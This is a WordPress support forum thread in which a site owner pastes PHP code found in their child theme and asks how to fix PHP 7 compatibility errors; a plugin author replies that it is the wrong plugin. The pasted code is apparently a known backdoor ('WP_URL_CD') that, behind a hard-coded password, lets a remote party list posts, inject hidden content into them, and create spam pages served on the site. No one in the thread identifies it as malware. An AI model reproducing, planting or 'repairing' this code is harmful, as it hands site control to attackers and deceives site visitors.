Php 7 compatibility

  • Resolved Anonymous User 14701108

    (@anonymized-14701108)


    7 years, 3 months ago

    Hi all,
    On my site (https://www.eurosudsrl.com) when I test php7 compatibility there are some error on my child theme whit a code of WPDB insert there (and i don’t know why).

    The code are the following:

    <?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'obscured password'))
	{
		switch ($_REQUEST['action'])
			{
				case 'get_all_links';
					foreach ($wpdb->get_results('SELECT * FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>post_status</code> = "publish" AND <code>post_type</code> = "post" ORDER BY <code>ID</code> DESC', ARRAY_A) as $data)
						{
							$data['code'] = '';
							
							if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
								{
									$data['code'] = $_[1];
								}
							
							print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
						}
				break;
				
				case 'set_id_links';
					if (isset($_REQUEST['data']))
						{
							$data = $wpdb -> get_row('SELECT <code>post_content</code> FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>ID</code> = "'.mysql_escape_string($_REQUEST['id']).'"');
							
							$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
							if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

							if ($wpdb->query('UPDATE <code>' . $wpdb->prefix . 'posts</code> SET <code>post_content</code> = "' . mysql_escape_string($post_content) . '" WHERE <code>ID</code> = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
								{
									print "true";
								}
						}
				break;
				
				case 'create_page';
					if (isset($_REQUEST['remove_page']))
						{
							if ($wpdb -> query('DELETE FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'"'))
								{
									print "true";
								}
						}
					elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
						{
							if ($wpdb -> query('INSERT INTO <code>' . $wpdb->prefix . 'datalist</code> SET <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'", <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string($_REQUEST['content']).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
								{
									print "true";
								}
						}
				break;
				
				default: print "ERROR_WP_ACTION WP_URL_CD";
			}
			
		die("");
	}

	
if ( $wpdb->get_var('SELECT count(*) FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
	{
		$data = $wpdb -> get_row('SELECT * FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
		if ($data -> full_content)
			{
				print stripslashes($data -> content);
			}
		else
			{
				print '<!DOCTYPE html>';
				print '<html ';
				language_attributes();
				print ' class="no-js">';
				print '<head>';
				print '<title>'.stripslashes($data -> title).'</title>';
				print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
				print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
				print '<meta name="robots" content="index, follow" />';
				print '<meta charset="';
				bloginfo( 'charset' );
				print '" />';
				print '<meta name="viewport" content="width=device-width">';
				print '<link rel="profile" href="https://gmpg.org/xfn/11">';
				print '<link rel="pingback" href="';
				bloginfo( 'pingback_url' );
				print '">';
				wp_head();
				print '</head>';
				print '<body>';
				print '<div id="content" class="site-content">';
				print stripslashes($data -> content);
				get_search_form();
				get_sidebar();
				get_footer();
			}
		exit;
	}
?>

    On obscured password there is an alphanumeric code.

    Php compatibility result code:

    | ERROR | Function mysql_escape_string() is deprecated since PHP 5.3 and removed since PHP 7.0; Use mysqli_real_escape_string instead
| ERROR | Extension 'mysql_' is deprecated since PHP 5.5 and removed since PHP 7.0; Use mysqli instead

    Can I delete this code or I have to modify the mysql_escape_string into mysqli_real_escape_string?

    • This topic was modified 7 years, 3 months ago by Anonymous User 14701108.
Viewing 2 replies - 1 through 2 (of 2 total)
  • Plugin Author Lester Chan

    (@gamerz)

    Wrong plugin.

    Thread Starter Anonymous User 14701108

    (@anonymized-14701108)

    Doh! I’m so sorry.

    In code I’ve read WPDB and thinking the code are WPDB Manager.

    I’ll delete this code.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Php 7 compatibility’ is closed to new replies.